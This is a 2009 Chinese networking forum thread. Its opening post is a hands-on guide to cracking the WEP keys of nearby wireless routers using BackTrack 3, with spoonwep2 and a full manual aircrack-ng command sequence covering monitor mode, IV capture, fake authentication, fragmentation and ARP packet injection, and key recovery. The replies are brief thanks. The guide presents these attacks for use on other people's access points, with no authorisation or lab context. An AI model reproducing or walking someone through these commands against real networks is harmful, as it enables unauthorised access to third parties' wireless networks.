ubnt解决方案
查看: 6919|回复: 16

近来研究BT3破解wep的宝贵心得的分享!

[复制链接]

32

回帖

365

积分

18 小时

在线时间

少尉

注册时间
2009-5-6
金币
324 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-10 16:41 |显示全部楼层
本帖最后由 fangjiantao 于 2009-5-10 17:27 编辑

首先说下:想要破解无线信号,信号强弱和稳定是非常非常重要的(尽管信号一般的也会被破解,但是要真正享受那种快感个人猜测应该是很爽的)

笔者的测试使用是笔记本内置的网卡(常见的intel 3945,这个网卡在之前的逛论坛中总是有诸多问题,但是确实可以用来破解所以)

BT3的启动:笔者使用的是那种傻瓜式是的硬盘启动,适合任何的格式,包括NTFS的。

1:这个版本之需要有个D盘将解压出来的BT3和boot两个文件夹复制到D盘的根目录下
2:在将一个小文件(名为grldr的隐藏文件复制到C盘的根目录下)
3:之后只需要修改下系统属性—高级—启动和故障恢复的那个设置—手动编辑启动选项的那个编辑(具体操作网上相信早出来这个版本)

怎样启动?:重启的时候会给你3秒的选择的时间,就是和装有DOS工具的系统重启一样的,你选择BT3进入就好,进入后选start BT3 on disk D然后输入用户名root和密码toor 接着输入startx就进入了
这里我没有下载链接给出哦!大家可以去找找!

其他的BT3启动的问题:
1:至于VMware下的BT3我没法用(笔记本内置无线网卡不支持)

2:而U盘启动的那个版本:做法按传统的那种先用FAT格式格式化2G(大于1G就行)U盘,然后直接从硬盘内解压BT3 U版的iso文件到U盘的根目录,然后运行cmd——X:(X的u盘盘符)——cd boot(好像是这个命令,反正当时和教程上一样)——xxxxx.bat(具体名,大家都知道是哪个文件的)——OK?(教程上说之后U盘启动就行了)——好,偶就u盘启动下——画面很简约“boot error” ——得!不在多考虑反正有个方法能进入BT3就好。(在这里有高手的大哥们可以给我分析下,毕竟能多种进入的方法谁也不介意)

3:光盘启动啊?个人太懒,不想花那个时间,那个先winiso软件将spoonwep.lzm和中文言语包之类的lzm文件加载进iso文件里在来刻录(光盘不要钱吗?不伤光驱吗?光盘容易携带吗?还有那个使用中临时文件的保存的问题。)这个方法我是没一点兴趣,个人太懒,没使用过这方法就不多说了。

懒人的心得:上面所诉的硬盘启动法和U盘启动法最方便(硬盘启动法适合所有的机器,U盘启动法不太清楚,但如果做成功应该问题不大,至少绝大部分的机器都适合吧)
   
笔者很难过为啥我就没成功的呢?(我U盘正品联想2G的—很好的U盘啊,价格也不便宜,在便宜的真假U盘疯狂肆虐的电子产品商店中我是滴着血在专柜买的啊)方法有问题吗?






对于破解有(无)客户端的无线路由wep密码我们先需要了解下的是:自动破解和手动破解

自动破解需要的软件是spoonwep和spoonwep2(spoonwep2是spoonwep的升级版,操作更简单、傻瓜,以下就用spoonwep2来讲解)需要提下的是spoonwep2不是BT3自带的,需要将spoonwep2.lzm加载到\BT3\modules得目录下(对于加载这个词的理解是:光盘启动是用winiso软件加载到iso文件中,而在U盘启动的和硬盘启动的直接可以理解为复制到\BT3\modules目录下就可以了)

无线网卡芯片是intel 3945的 加载驱动后接口名为wifi0

具体操作与演示:
打开新的shell窗口输入:输入modprobe –r iwl3945回车modprobe ipwraw回车spoonwep回车接下来会弹出一个窗口,接下来操作相信网上有许多视频之类的。大家可以搜搜。

这里提供一个图文解释的和视频下载的网址:
http://www.hacker.com.cn/article/view_14896.html



手动破解:就是用支持BT3的系统下的命令。要在shell窗口下输入命令的(虽然简单,但是还是让我看到了我对编程方面的毫无天赋啊!!! daji!)

具体的操作,该论坛有图文操作的不要太多(多得你都不知道该选哪个)如果是intel 3945的网卡我推荐“Intel3945ABG在BT3下破解有(无)客户端wep简明教程”该教程。

而该手动破解的心得和注意点

刚开启shell窗口的时候我们我们要做的是知道接口名和加载无线网卡的驱动:

1:普通的usb无线网卡:用ifconfig –a来查看网卡接口名,和用ifconfig –a 接口名 up 来加载驱动(而intel 3945网卡所用的命令不同,它是modprobe –r iwl3945回车modprobe ipwraw回车。这里解释下modprobe –r iwl3945是先卸载什么驱动,modprobe ipwraw是加载ipw驱动)

2:加载完驱动我们要做的是将网卡在哪个信道的监听模式激活(假如我们要监视常见的信道为6的AP)命令为airmon-ng start 接口名 6 (这里接口名我们intel 3945 的用wifi0)

3:开始抓CAP数据包(搜索附近的无线信号,可以显示附近有的无线路由的mac地址,essid名称,还有使用的信道)
命令:airodump-ng --ivs -w name -c 6 wifi0这里的name就是要创建的临时文件名可以任写)

4:另开一个新的shell窗口连接要破解的AP的mac地址
命令:aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0

如果链接成功系统将回显
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)

5:连接成功后以下就下注入攻击包来攻击(简单的理解为当无客户端是我们注入攻击包就是为了去接受因AP接到攻击包之后而发出的反馈数据,最终目的就是通过算法来对反馈数据进行破解)

(1)输入aireplay-ng -5 -b ap的mac -h 自己网卡的mac wifi0来获得xor文件。系统显示成功后只要输入“y”回车

(2)接着输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 –l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp(其中要注意的是-l的l是L的小写,mrarp是arp攻击包的名称,名称可任意写,××××-××××.xor 是你刚才生成的文件名,可以用命令ls来查看)
成功了系统显示系统回显:Wrote packet to: mrarp

(3)接下来发送攻击包命令是aireplay-ng -2 –r mrarp -x 1024 wifi0(-x 1024 是限定发包速度,避免网卡死机,我选择的是1024)再输入“y”开始攻击

6:当data数据快速增涨到3万以上时我们再次新打开一个shell窗口来用aircrack-ng命令来对生成的.ivs文件进行最后的破解。
命令为aircrack-ng -n 64 -b ap的mac name-01.ivs(64是密码的的位数,也可以是128位密码,还有要注意的是当name-01文件找不到或打不开时用“*.ivs”来代替,意思是破解所有后缀名为.ivs的文件)


自动和手动破解的中出现的情况的对比分析:
在intel 3945网卡的条件下:自动破解时用spoonwep2来抓CAP数据时有时会无法搜到质量一般的信号,而用命令来搜的时候却能收到,然而spoonwep2破解时的方便快捷是无法忽视。

对于有无客户端的破解的理解:个人认为信号质量不错的情况下用以上方法都能破解无线路由(不管是否有客户端都可用无客户端情况下的方法来破解)总而言之在破解中能否能连接目标AP的mac地址是很重要(这需要的信号质量要求还挺高的)




最后本人刚在该论坛学习想向各位大哥们求助下:我想买个不管是破解还是windows下无线上网信号都很强很稳定且不虚标的无线USB网卡,价格不在考虑内(不夸张就好)。大家可以推荐下吗?


评分

2

查看全部评分

2805

回帖

2万

积分

528 小时

在线时间

大校

注册时间
2006-5-2
金币
25134 个
威望
60 个
荣誉
13 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-5-10 16:46 |显示全部楼层
感谢分享!
回复

使用道具 举报

851

回帖

5320

积分

142 小时

在线时间

中校

注册时间
2008-12-27
金币
4183 个
威望
40 个
荣誉
6 个

尚未签到

发表于 2009-5-10 16:46 |显示全部楼层
顶一下先!!!!
回复

使用道具 举报

1965

回帖

2万

积分

757 小时

在线时间

论坛巡察员

太平绅士灌水天才

注册时间
2009-4-12
金币
18141 个
威望
58 个
荣誉
13 个
累计签到:177 天
连续签到:0 天
[LV.200]无线新星
发表于 2009-5-10 16:58 |显示全部楼层
感谢分享……
回复

使用道具 举报

265

回帖

1181

积分

28 小时

在线时间

上尉

注册时间
2009-4-17
金币
738 个
威望
20 个
荣誉
6 个

尚未签到

发表于 2009-5-10 17:27 |显示全部楼层
感谢分享~~~~~
回复

使用道具 举报

1487

回帖

2万

积分

775 小时

在线时间

VIP

杰出会员最佳评测手

注册时间
2009-3-26
金币
23543 个
威望
88 个
荣誉
11 个
累计签到:925 天
连续签到:0 天
[LV.1095]铁杆粉丝
发表于 2009-5-11 15:48 |显示全部楼层
不錯的分享。。。。
回复

使用道具 举报

206

回帖

811

积分

51 小时

在线时间

中尉

注册时间
2008-11-9
金币
597 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-13 00:21 |显示全部楼层
谢谢分享,顶下先。
回复

使用道具 举报

42

回帖

117

积分

6 小时

在线时间

上等兵

注册时间
2008-6-24
金币
71 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-13 11:53 |显示全部楼层
学习一下!!!!!!!!!!!!!!!!!!!!!!
回复

使用道具 举报

21

回帖

51

积分

6 小时

在线时间

上等兵

注册时间
2009-5-12
金币
25 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-13 16:27 |显示全部楼层
非常的感谢你了,正在消化
回复

使用道具 举报

563

回帖

4928

积分

178 小时

在线时间

少校

注册时间
2008-3-4
金币
4141 个
威望
24 个
荣誉
6 个

尚未签到

发表于 2009-5-13 22:54 |显示全部楼层
写的不错~~
回复

使用道具 举报

102

回帖

662

积分

15 小时

在线时间

中尉

注册时间
2009-5-10
金币
480 个
威望
3 个
荣誉
6 个

尚未签到

发表于 2009-5-13 22:58 |显示全部楼层
顶起来看看,慢慢学了
回复

使用道具 举报

56

回帖

1006

积分

108 小时

在线时间

上尉

注册时间
2009-5-7
金币
848 个
威望
6 个
荣誉
6 个

尚未签到

发表于 2009-6-2 15:08 |显示全部楼层
用魔翼吧!!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-12-20 02:10

返回顶部 返回列表